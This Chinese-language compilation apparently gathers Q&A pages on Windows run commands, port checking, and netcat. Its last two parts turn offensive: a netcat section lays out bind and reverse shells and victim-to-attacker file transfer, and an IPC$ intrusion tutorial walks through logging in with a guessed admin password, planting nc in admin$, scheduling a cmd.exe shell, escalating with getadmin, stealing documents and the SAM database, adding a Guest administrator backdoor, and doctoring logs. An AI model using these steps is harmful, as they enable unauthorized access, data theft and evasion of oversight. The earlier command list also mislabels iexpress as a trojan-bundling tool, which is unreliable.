‘壹’ 计算机命令
regedit注册表
给你一个资料,想必对你来讲有保存价值:
开始菜单中的“运行”是通向程序的快捷途径,输入特定的命令后,即可快速的打开Windows的大部分程序,熟练的运用它,将给我们的操作带来诸多便捷。
winver 检查Windows版本
wmimgmt.msc 打开Windows管理体系结构(wmi)
wupdmgr Windows更新程序
wscript Windows脚本宿主设置
write 写字板
winmsd 系统信息
wiaacmgr 扫描仪和照相机向导
winchat xp自带局域网聊天
mem.exe 显示内存使用情况
msconfig.exe 系统配置实用程序
mplayer2 简易widnows media player
mspaint 画图板
mstsc 远程桌面连接
mplayer2 媒体播放机
magnify 放大镜实用程序
mmc 打开控制台
mobsync 同步命令
dxdiag 检查directx信息
drwtsn32 系统医生
devmgmt.msc 设备管理器
dfrg.msc 磁盘碎片整理程序
diskmgmt.msc 磁盘管理实用程序
dcomcnfg 打开系统组件服务
ddeshare 打开dde共享设置
dvdplay dvd播放器
net stop messenger 停止信使服务
net start messenger 开始信使服务
notepad 打开记事本
nslookup 网络管理的工具向导
ntbackup 系统备份和还原
narrator 屏幕“讲述人”
ntmsmgr.msc 移动存储管理器
ntmsoprq.msc 移动存储管理员操作请求
netstat -an (tc)命令检查接口
syncapp 创建一个公文包
sysedit 系统配置编辑器
sigverif 文件签名验证程序
sndrec32 录音机
shrpubw 创建共享文件夹
secpol.msc 本地安全策略
syskey 系统加密,一旦加密就不能解开,保护Windows xp系统的双重密码
services.msc 本地服务设置
sndvol32 音量控制程序
sfc.exe 系统文件检查器
sfc /scannow windows文件保护 tsshutdn 60秒倒计时关机命令
tourstart xp简介(安装完成后出现的漫游xp程序)
taskmgr 任务管理器
eventvwr 事件查看器
eudcedit 造字程序
explorer 打开资源管理器
packager 对象包装程序
perfmon.msc 计算机性能监测程序
progman 程序管理器
regedit.exe 注册表
rsop.msc 组策略结果集
regedt32 注册表编辑器
rononce -p 15秒关机
regsvr32 /u *.dll 停止dll文件运行
regsvr32 /u zipfldr.dll 取消zip支持
cmd.exe cmd命令提示符
chkdsk.exe chkdsk磁盘检查
certmgr.msc 证书管理实用程序
calc 启动计算器
charmap 启动字符映射表
cliconfg sql server 客户端网络实用程序
clipbrd 剪贴板查看器
conf 启动netmeeting
compmgmt.msc 计算机管理
cleanmgr 垃圾整理
ciadv.msc 索引服务程序
osk 打开屏幕键盘
odbcad32 odbc数据源管理器
oobe/msoobe /a 检查xp是否激活
lusrmgr.msc 本机用户和组
logoff 注销命令
iexpress 木马捆绑工具,系统自带
nslookup ip地址侦测器
fsmgmt.msc 共享文件夹管理器
utilman 辅助工具管理器
gpedit.msc 组策略
以下为Windows操作系统的常用运行命令,执行这些命令,就能打开系统对应的相关实用程序,如果大家能基本利用,就能检查并修复系统的最基本的故障,除注销,关闭系统命令外,其它所有命令,大家不妨一试!!
运行\输入CMD\输入 对应的相关实用程序:
. 打开C:\Documents and Settings\XXX(当前登录Windows XP的用户名)
.. 打开Windows XP所在的盘符下的Documents and Settings文件夹
... 打开“我的电脑”选项。
accwiz.exe 辅助工具向导
actmovie.exe 直接显示安装工具
append.exe 允许程序打开制定目录中的数据
arp.exe 显示和更改计算机的IP与硬件物理地址的对应列表
at.exe 计划运行任务
atmadm.exe ATM调用管理器统计
attrib.exe 显示和更改文件和文件夹属性
autochk.exe 检测修复文件系统 (XP不可用)
autoconv.exe 在启动过程中自动转化系统 (XP不可用)
autofmt.exe 在启动过程中格式化进程 (XP不可用)
autolfn.exe 使用长文件名格式 (XP不可用)
arp.exe 显示和更改计算机的IP与硬件物理地址的对应
calc.exe 计算器
Bootvrfy.exe 通报启动成功
cacls.exe 显示和编辑ACL
cdplayer.exe CD播放器
change.exe 与终端服务器相关的查询 (XP不可用)
charmap.exe 字符映射表
chglogon.exe 启动或停用会话记录 (XP不可用)
chgport.exe 改变端口(终端服务) (XP不可用)
chgusr.exe 改变用户(终端服务) (XP不可用)
chkdsk.exe 磁盘检测程序
chkntfs.exe NTFS磁盘检测程序
cidaemon.exe 组成Ci文档服务
cipher.exe 在NTFS上显示或改变加密的文件或目录
cisvc.exe 打开索引内容
ckcnv.exe 变换Cookie
cleanmgr.exe 磁盘清理
cliconfg.exe SQL客户网络工具
clipbrd.exe 剪贴簿查看器
clipsrv.exe 运行Clipboard服务
clspack.exe 建立系统文件列表清单
cluster.exe 显示域的集群 (XP不可用)
cmd.exe 进2000\XP DOS
cmdl32.exe 自动下载连接管理
cmmgr32.exe 连接管理器
cmmon32.exe 连接管理器监视
cmstp.exe 连接管理器配置文件安装程序
comclust.exe 集群
comp.exe 比较两个文件和文件集的内容
conf 启动netmeeting聊天工具
control userpasswords2 XP密码管理.
compmgmt.msc 计算机管理
cprofile.exe 转换显示模式 (XP不可用)
开始,运行,输入CMD\输入net config workstation计算机名 \完整的计算机名\用户名
工作站处于活动状态(即网络描述) \软件版本(即软件版本号) \工作站域 工作站域的 DNS 名称
登录域 \COM 打开时间超时(秒) \COM 发送量(字节) \COM 发送超时 (msec)
CMD\输入net config workstation 更改可配置工作站服务设置。
CMD\输入net config server 可以显示不能配置的下服务器计算机名 \服务器注释 \服务器版本(即软件版本号)
服务器处于活动状态(即网络描述) \服务器处于隐藏状态(即 /hidden 设置)
最大登录用户数(即可使用服务器共享资源的最大用户数)
每个会话打开文件的最大数(即用户可在一个会话中打开服务器文件的最大数)
空闲会话时间(最小值)
chkdsk.exe 磁盘检查.
Chkdsk /r 2000命令控制台中的Chkdsk /r命令检查修复系统文件
cleanmgr 垃圾整理
Clipbrd 剪贴板查看器
C:boot.ini 打开启动菜单
compact.exe 显示或改变NTFS分区上文件的压缩状态
conime.exe IME控制台
control.exe 控制面板
convert.exe NTFS 转换文件系统到NTFS
convlog.exe 转换IIS日志文件格式到NCSA格式
cprofile.exe 转换显示模式
cscript.exe 较本宿主版本
csrss.exe 客户服务器Runtime进程 (XP不可用)
csvde.exe 格式转换程序 (XP不可用)
dcpromo 活动目录安装(XP不可用)
drwtsn32 系统医生
diskmgmt.msc 磁盘管理器(和PowerQuest PartitionMagic 8.0)
dvdplay DVD 播放器
devmgmt.msc 设备管理器(检查电脑硬件,驱动)
dxdiag 检查DirectX信息
dcomcnfg.exe DCOM配置属性 (控制台根目录)
dcpromo.exe 安装向导 (XP不可用)
ddeshare.exe DDE共享
debug.exe 检查DEBUG
dfrgfat.exe FAT分区磁盘碎片整理程序
dfrgntfs.exe NTFS分区磁盘碎片整理程序 (XP不可用)
dfs_cmd_.exe 配置DFS树 (XP不可用)
dfsinit.exe 分布式文件系统初始化(XP不可用)
dfssvc.exe 分布式文件系统服务器 (XP不可用)
diantz.exe 制作CAB文件
diskperf.exe 磁盘性能计数器
dmremote.exe 磁盘管理服务的一部分 (XP不可用)
doskey.exe 命令行创建宏
dosx.exe DOS扩展
dplaysvr.exe 直接运行帮助 (XP不可用)
drwatson.exe 华生医生错误检测
drwtsn32.exe 华生医生显示和配置管理
dvdplay.exe DVD播放
dxdiag.exe Direct-X诊断工具
edlin.exe 命令行的文本编辑
esentutl.exe MS数据库工具
eudcedit.exe 造字程序
eventvwr.exe 事件查看器
exe2bin.exe 转换EXE文件到二进制
expand.exe 解压缩
extrac32.exe 解CAB工具
fsmgmt.msc 共享文件夹
fastopen.exe 快速访问在内存中的硬盘文件
faxcover.exe 传真封面编辑
faxqueue.exe 显示传真队列
faxsend.exe 发送传真向导
faxsvc.exe 启动传真服务
fc.exe 比较两个文件的不同
find.exe 查找文件中的文本行
findstr.exe 查找文件中的行
finger.exe 一个用户并显示出统计结果
fixmapi.exe 修复MAPI文件
flattemp.exe 允许或者禁用临时文件目录 (XP不可用)
fontview.exe 显示字体文件中的字体
forcedos.exe 强制文件在DOS模式下运行
ftp.exe FTP下载
gpedit.msc 组策略
gdi.exe 图形界面驱动
grpconv.exe 转换程序管理员组
hostname.exe 显示机器的Hostname
Internat 输入法图标
iexpress 木马捆绑工具,系统自带
ieshwiz.exe 自定义文件夹向导
iexpress.exe iexpress安装包
iisreset.exe 重启IIS服务(未安装IIS,不可用)
internat.exe 键盘语言指示器 (XP不可用)
ipconfig.exe 查看IP配置
ipsecmon.exe IP安全监视器
ipxroute.exe IPX路由和源路由控制程序
irftp.exe 无线连接
ismserv.exe 安装或者删除Service Control Manager中的服务
jdbgmgr.exe Java4的调试器
jetconv.exe 转换Jet Engine数据库 (XP不可用)
jetpack.exe 压缩Jet数据库 (XP不可用)
jview.exe Java的命令行装载者
label.exe 改变驱动器的卷标
lcwiz.exe 许可证向导 (XP不可用)
ldifde.exe LDIF目录交换命令行管理 (XP不可用)
licmgr.exe 终端服务许可协议管理 (XP不可用)
lights.exe 显示连接状况 (XP不可用)
llsmgr.exe Windows 2000 许可协议管理 (XP不可用)
llssrv.exe 启动许可协议服务器 (XP不可用)
locator.exe RPC Locator 远程定位
lodctr.exe 调用性能计数
logoff.exe 注销当前用户
lpq.exe 显示远端的LPD打印队列的状态,显示被送到基于Unix的服务器的打印任务
lpr.exe 用于Unix客户打印机将打印任务发送给连接了打印设备的NT的打印机服务器。
lsass.exe 运行LSA和Server的DLL
lserver.exe 指定默认Server新的DNS域 (XP不可用)
lusrmgr.msc 本地账户管理
mmc 控制台
mplayer2 播放器
macfile.exe 管理MACFILES (XP不可用)
magnify.exe 放大镜
makecab.exe 制作CAB文件
mem.exe 显示内存状态
migpwd.exe 迁移密码
mmc.exe 控制台
mnmsrvc.exe 远程桌面共享
mobsync.exe 同步目录管理器
mountvol.exe 创建、删除或列出卷的装入点。
mplay32.exe Media Player 媒体播放器
mpnotify.exe 通知应用程序
mqbkup.exe 信息队列备份和恢复工具
mqmig.exe MSMQ Migration Utility 信息队列迁移工具
mrinfo.exe 使用SNMP多点传送路由
mscdexnt.exe 安装MSCD
msdtc.exe 动态事务处理控制台
msg.exe 发送消息到本地或远程客户
mshta.exe HTML应用程序主机
msiexec.exe 开始Windows安装程序
mspaint.exe 打开画图板
mstask.exe 任务计划表程序
mstinit.exe 任务计划表安装
Msconfig.exe 系统配置实用程序 (配置启动选项,服务项)
mem.exe 显示内存使用情况
mspaint 画图板
Net Stop Messenger 停止信使服务
Net Start Messenger 恢复信使服务
nslookup 网络管理的工具
Nslookup IP 地址侦测器
ntbackup 系统备份和还原
nbtstat.exe 使用 NBT(TCP/IP 上的 NetBIOS)显示协议统计和当前 TCP/IP 连接。
nddeapir.exe NDDE API服务器端
netsh.exe 用于配置和监控 Windows 2000 命令行脚本接口(XP不可用)
netstat.exe 显示协议统计和当前的 TCP/IP 网络连接。
nlsfunc.exe 加载特定国家的信息。Windows 2000 和 MS-DOS 子系统不使用该命令接受该命令只是为了与 MS-DOS 文件兼容。
notepad.exe 打开记事本
nslookup.exe 该诊断工具显示来自域名系统 (DNS) 名称服务器的信息。
ntbackup.exe 备份和故障修复工具
ntfrs.exe NT文件复制服务 (XP不可用)
ntvdm.exe 模拟16位Windows环境
nw16.exe NetWare转向器
nwscript.exe 运行Netware脚本
odbcad32.exe 32位ODBC数据源管理 (驱动程序管理)
odbcconf.exe 命令行配置ODBC驱动和数据源
packager.exe 对象包装程序
pathping.exe 包含Ping和Tracert的程序
pentnt.exe 检查Pentium的浮点错误
perfmon.exe 系统性能监视器
ping.exe 验证与远程计算机的连接
posix.exe 用于兼容Unix
print.exe 打印文本文件或显示打印队列的内容。
progman.exe 程序管理器
psxss.exe Posix子系统应用程序
qappsrv.exe 在网络上显示终端服务器可用的程序
qprocess.exe 在本地或远程显示进程的信息(需终端服务)
query.exe 查询进程和对话 (XP不可用)
quser.exe 显示用户登陆的信息(需终端服务)
qwinsta.exe 显示终端服务的信息
rononce -p 15秒关机
rasAdmin 远程访问服务.
regedit.exe 注册表编辑器
rasadmin.exe 启动远程访问服务 (XP不可用)
rasautou.exe 建立一个RAS连接
rasdial.exe 宽带,拨号连接
ras.exe 运行RAS连接 (XP不可用)
rcp.exe 计算机和运行远程外壳端口监控程序 rshd 的系统之间复制文件
rdpclip.exe 终端和本地复制和粘贴文件
recover.exe 从坏的或有缺陷的磁盘中恢复可读取的信息。
redir.exe 运行重定向服务
regedt32.exe 32位注册服务
regini.exe 用脚本修改注册许可
regwiz.exe 注册向导
replace.exe 用源目录中的同名文件替换目标目录中的文件。
rexec.exe rexec 命令在执行指定命令前,验证远程计算机上的用户名,只有安装了 TCP/IP 协议后才可以使用该命令。
risetup.exe 运行远程安装向导服务 (XP不可用)
route.exe 控制网络路由表
rsh.exe 在运行 RSH 服务的远程计算机上运行命令
rsnotify.exe 远程存储通知回显
runas.exe 允许用户用其他权限运行指定的工具和程序
rundll32.exe 启动32位DLL程序
rwinsta.exe 重置会话子系统硬件和软件到最初的值
Sndvol32 音量控制程序
sfc.exe 或CMD\ sfc.exe 回车 系统文件检查器
services.msc 网络连接服务
syskey 系统加密,(一旦加密就不能解开,保护windows xp系统的双重密码wupdmgr WIDNOWS UPDATE)
SCANREG/RESTORE 命令恢复最近的注册表
secedit.exe 自动化安全性配置管理
services.exe 控制所有服务
sethc.exe 设置高对比
setver.exe 设置 MS-DOS 子系统向程序报告的 MS-DOS 版本号
sfc.exe 系统文件检查
shadow.exe 监控另外一台中端服务器会话
shrpubw.exe 建立和共享文件夹
sigverif.exe 文件签名验证
smlogsvc.exe 性能日志和警报 (XP不可用)
sndrec32.exe 录音机
sndvol32.exe 显示声音控制信息
snmp.exe 简单网络管理协议 (XP不可用)
snmptrap.exe SNMP工具 (XP不可用)
srvmgr.exe 服务器管理器 (XP不可用)
subst.exe 将路径与驱动器盘符关联
sysedit.exe 系统配置编辑器
syskey.exe NT账号数据库加密工具
sysocmgr.exe > Windows 安装程序
systray.exe 在低权限运行systray
taskmgr 任务管理器
tasklist /svc(CMD)了解每个SVCHOST进程到底提供了多少系统服务(2000\98不可用)
tlist -S(CMD) 了解每个SVCHOST进程到底提供了多少系统服务(
taskman.exe 任务管理器 (XP不可用)
taskmgr.exe 任务管理器
tcmsetup.exe 电话服务客户安装
tcpsvcs.exe TCP服务
termsrv.exe 终端服务
tftp.exe 将文件传输到正在运行 TFTP 服务的远程计算机或从正在运行 TFTP 服务的远程计算机传输文件
themes.exe 桌面主题 (XP不可用)
tlntadmn.exe Administrator Telnet服务管理
tlntsess.exe 显示目前的Telnet会话
tlntsvr.exe 开始Telnet服务
tracert.exe 诊断实用程序将包含不同生存时间 (TTL) 值的 Internet 控制消息协议 (ICMP) 回显数据包发送到目标,以决定到达目标采用的路由
tsadmin.exe Administrator 终端服务管理器 (XP不可用)
tscon.exe 粘贴用户会话到终端对话
tsdiscon.exe 断开终端服务的用户
tskill.exe 杀掉终端服务
tsprof.exe 用终端服务得出查询结果
tsshutdn.exe 关闭系统
unlodctr.exe 性能监视器的一部分
upg351db.exe 升级Jet数据库 (XP不可用)
ups.exe UPS service UPS服务
user.exe Windows核心服务
userinit.exe 打开我的文档
usrmgr.exe 域用户管理器
utilman.exe 指定2000启动时自动打开那台机器
vwipxspx.exe 调用IPX/SPX VDM
w32tm.exe 时间服务器
wextract.exe 解压缩Windows文件
winchat.exe 打开Windows聊天工具
winhlp32.exe 运行帮助系统
winmsd.exe 查看系统信息
winver.exe 显示Windows版本
wizmgr.exe Windows管理向导 (XP不可用)
wjview.exe Java 命令行调用Java
write.exe 打开写字板
wscript.exe 脚本工具
wupdmgr.exe Windows update 运行Windows update升级向导
winver 检查Windows版本
Win98系统工具
开始,运行,输入Msconfig 系统配置实用工具 配置启动选项,包括config.sys、autoexec.bat、win.ini、system.ini和注册表及程序菜单中的启动项。并可设置是否故障启动。
开始,运行,输入Regedit 注册表修改工具 注册表编辑器,如果没有把握不要随意修改注册表!
开始,运行,输入Regsvr32 dll注册工具 当提示找不到dll文件时,可用此来注册该动态连接库。
开始,运行,输入Regwiz 注册向导 用于注册。校验系统文件,并可恢复系统文件。
如果启动时出现类似*.vxd文件错误,可用此恢复该vxd文件。
开始,运行,输入Scandskw 磁盘扫描程序,用于扫描修复磁盘。如果磁盘或文件出现错误,可用来初步修复。
开始,运行,输入DxDiag DirectX诊断工具可用于检测DirectX运行是否正常。
开始,运行,输入NETSCAPE
ESC:清除当前命令行;
F7:显示命令历史记录,以图形列表窗的形式给出所有曾经输入的命令,并可用上下箭头键选择再次执行该命令。
F8:搜索命令的历史记录,循环显示所有曾经输入的命令,直到按下回车键为止;
F9:按编号选择命令,以图形对话框方式要求您输入命令所对应的编号(从0开始),并将该命令显示在屏幕上;
Ctrl+H:删除光标左边的一个字符;
Ctrl+C Ctrl+Break,强行中止命令执行;
Ctrl+M:表示回车确认键;
Alt+F7:清除所有曾经输入的命令历史记录;
Alt+PrintScreen:截取屏幕上当前命令窗里的内容。
病毒破坏了系统文件,请使用杀毒软件查杀病毒,然后利用Windows 2000提供的“命令控制台”中的Chkdsk /r命令检查修复系统文件即可。
‘贰’ CMD命令提示符下如何开启关闭端口
二楼的前提是 瑞士军刀 自己下一个
Netstat
这个命令可以加一些参数:
-n 显示IP地址和端口的数目。
-S 显示每个协议的连接状态。
-a 显示所有的连接和监听端口。(服务所有连接通常不显示的)
-e 显示太网的连接状态。最好与-s合用。
-P PROTO 显示特定的协议连接状态。
关闭的话进 我的电脑右键-管理-服务。关闭相应的服务即关闭端口
在tcp/ip协议的高级里也可以
‘叁’ 怎么把测试电脑端口是否开放
如何检测(远程)主机上的某个端口是否开启,今天遇到一个问题就是在某某局点需要在某某防火墙上开放某些端口,但是我在某某防火墙上放开后,告知还是不能进行连接,我就想如何检测本机或者远程主机是否开放某某端口问题。
检测(远程)主机机是否开放某某端口:
windows下
在cmd里面使用netstat -an命令来查看 开放的TCP和UDP端口。
在cmd里面使用start /min telnet 127.0.0.1 某端口,之后会出现一个窗口,是最小化的,你等一会,如果窗口自动关闭了,说明端口是关闭,反之端口开放。
linux下
如windows下使用telnet的方法
使用nc命令
nc检测端口的用法:
nc -z -w 10 %ip% %PORT%
-z表示检测或者扫描端口
-w表示超时时间
-u表示使用UDP协议
例如:
# nc -z -w 10 -u 127.0.0.1 53
Connection to 127.0.0.1 53 port [udp/domain] succeeded!
# nc -z -w 10127.0.0.1 53
Connection to 127.0.0.1 53 port [tcp/domain] succeeded!
# echo $?
0
# nc -z -w 10 8.8.8.7 53
# echo $?
1
#
端口成功联通返回值是0,提示succeeded;否则返回1,不提示任何数据。linux下未作测试,网友遇到的时候自行测试。
‘肆’ 电脑常识:DOS命令之NC的定义和用法是
NC(netcat)的使用方法!
连接到某处:nc [-options] hostname port[s] [ports].....
监听某端口等待连接:nc -l -p port [options] [hostname] [port] -options
-d 后台运行
-e prog 程序重定向,一旦有连接,就执行绑定的程序。
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 帮助信息
-i 设定延时时间。
-l 监听方式,等待连入。连接完成后,结束监听。
-L 监听方式,等待连入。连接完成后,继续监听。
-n 只能使用ip地址。
-o file 指定要传送的16进制代码。
-p port 指定本地的端口号。
-r 随意指定本地或远程端口号。
-s addr 本地的源地址。
-t 回显telnet信息。
-u UDP方式。
-v 显示详细的信息,-vv 可获取更详细的信息。
-w 指定超时的时间。
-z 用于scan。
以上就是nc的一些参数和选项,注意,这是nt版本的nc。如果是*nix的需要自己编译。也都差不多,只是netcat.c默认是没有-t和-e这个两个参数,要改。
看看它能干些什么,(偶就知道这些)
1.端口的刺探:
nc -vv ip port
2.扫描器
nc -v -w 5 ip port-port
nc -v -z ip port-port
3. 后门
victim machine:
nc -l -p port -e cmd.exe
nc -l -p port -e /bin/sh
attacker machine:
nc victim ip -p port
得到一个shell。
4.反向连接
attacker machine:
nc -vv -l -p port
victim machine:
nc -e cmd.exe attacker ip -p port
nc -e /bin/sh attacker ip -p port
或者:
attacker machine:
nc -vv -l -p port1 /*用于输入*/
nc -vv -l -p prot2 /*用于显示*/
victim machine:
nc attacker ip port1 | cmd.exe | nc attacker ip port2
nc attacker ip port1 | /bin/sh | nc attacker ip port2
5.传送文件:
attacker machine <-- victim machine
nc -d -l -p port < path file /*attacker machine*/
nc -vv attacker ip -p port > path file /*victim machine*/
attacker machine --> victim machine
nc -vv -l -p > patm file/*victim machine*/
nc -d victim ip -p port < path file /*attacker machine*/
‘伍’ 怎样用nc.exe和IPC$入侵电脑入侵时使用地命令是什么~~~跪谢!!!!!!
IPC入侵攻略!其实针对IPC漏洞入侵的方法目前已经有很多的教程,但是其中很多教程并不完整,所以还是有很多网友来信问我关于IPC漏洞入侵的有关问题,这就是我写这篇文章的原因了。如果你觉得本文也不完整,那只好去找更好的版本了,但是我希望你能把你的意见和建议告诉我,让我不断的完善这篇文章。本文参考了小榕的流光2000说明文档及其它相关文档,也包含了一些自己的心得体会。本文欢迎非商业性转载,但请保持文章完整性并注明出处!:-)
IPC是Internet Process Connection的缩写,也就是远程网络连接。它是Windows NT及Windows 2000特有的一项功能,特点是在同一时间内,两个IP之间只允许建立一个连接。好了,废话少说,现在进入主题。
如何找到具有IPC漏洞的主机呢?以前我都是组合一个国外的扫描工具(名字我忘了)和KillUSA的LetMeIn,因为很多工作都是手工完成的,所以速度可想而知了。现在因为有了小榕的流光2000,所以找到这样的主机实在是太简单了,具体操作我就不说了,大家可以参考该软件的说明文档。
好了,假设我们已经找到了一台这样的主机,地址是139.223.200.xxx,管理员帐号是Administrator,密码是123456。进入命令行方式,正式开工。需要说明的是,以下操作都是在目标主机没有禁止远程IPC$连接和启动Schele服务的理想情况下进行的。
F:\》net use \\139.223.200.xxx\ipc$ "123456" /user:"Administrator"
命令成功完成。
F:\》 nc.exe \\139.223.200.xxx\admin$
已复制 1 个文件。
F:\》net time \\139.223.200.xxx
\\139.223.200.xxx 的当前时间是 2000/12/25 上午 10:25
在 \\139.223.200.xxx 的本地时间 (GMT - 07:00) 是 2000/12/25 上午10:35
命令成功完成。
F:\》at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe
新增加了一项作业,其作业 ID = 0
F:\》telnet 139.223.200.xxx 1234
上面的命令很简单,你只要参考一下net,at和nc的用法就可以了。这样,我们就登上了远程的主机。最理想的情况是这样的,但是,也许你会遇到目标主机的Schele服务没有启动的情况,那么,at命令就不能用了,我们就需要增加以下步骤。
F:\》at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe
服务仍未启动。
F:\》netsvc \\139.223.200.xxx schele /start
Service is running on \\139.223.200.xxx
登上远程主机之后,我们可以做什么呢?这要视这个帐号的权限以及该主机的安全策略来决定。如果你的权限不够的话,可以试试下面的步骤。首先在本地执行下面的命令。
F:\》 getadmin.exe \\139.223.200.xxx\admin$
已复制 1 个文件。
F:\》 gasys.dll \\139.223.200.xxx\admin$
已复制 1 个文件。
其次,在远程主机运行下面的命令。
C:\WINNT\system32》getadmin
如果成功的话,你就是这台主机的管理员了,权限够大了吧?:-)
那么,现在我们能做什么呢?改主页?下载SAM数据库?都可以啦!方法有很多,我就不一一说了,具体方法可以参考相关教程。我一般对目标主机上的WORD文档和数据库比较感兴趣,呵呵。。。
其实,如果你在这台机子上面放个木马或者病毒什么的东东,做起事来更容易一些,但是我觉得如果你跟他没什么深仇大恨的话,还是不要这么做了,这样不好。
作完了你要做的事,不要忘了做个后门。
C:\WINNT\system32》net user Guest 30906766
net use Guest 30906766
The command completed successfully.
C:\WINNT\system32》net localgroup administrators Guest /add
net localgroup administrators Guest /add
The command completed successfully.
这是个比较简单的后门,要想做的更好一些,可以象Linux那样,做出一套RootKits来,其实这样的东东目前已经有了,你只要拿来用就可以了。现在搞破坏真是简单多了,那么多的傻瓜工具任你用,哎!要想自保,不学点安全知识怎么行呢?
最后,我们得修理一下日志。虽然Redp0wer告诉我很少管理员会看NT的日志,但是我想修理一下还是有用的。NT的日志在什么地方呢?可以参考XUDI的文章。但是有一点要记住的是,日志只能修改,不能删除,否则就是自己把自己出卖了!:-)这方面的命令行工具也不少,你可以到一些国外的站点去看看。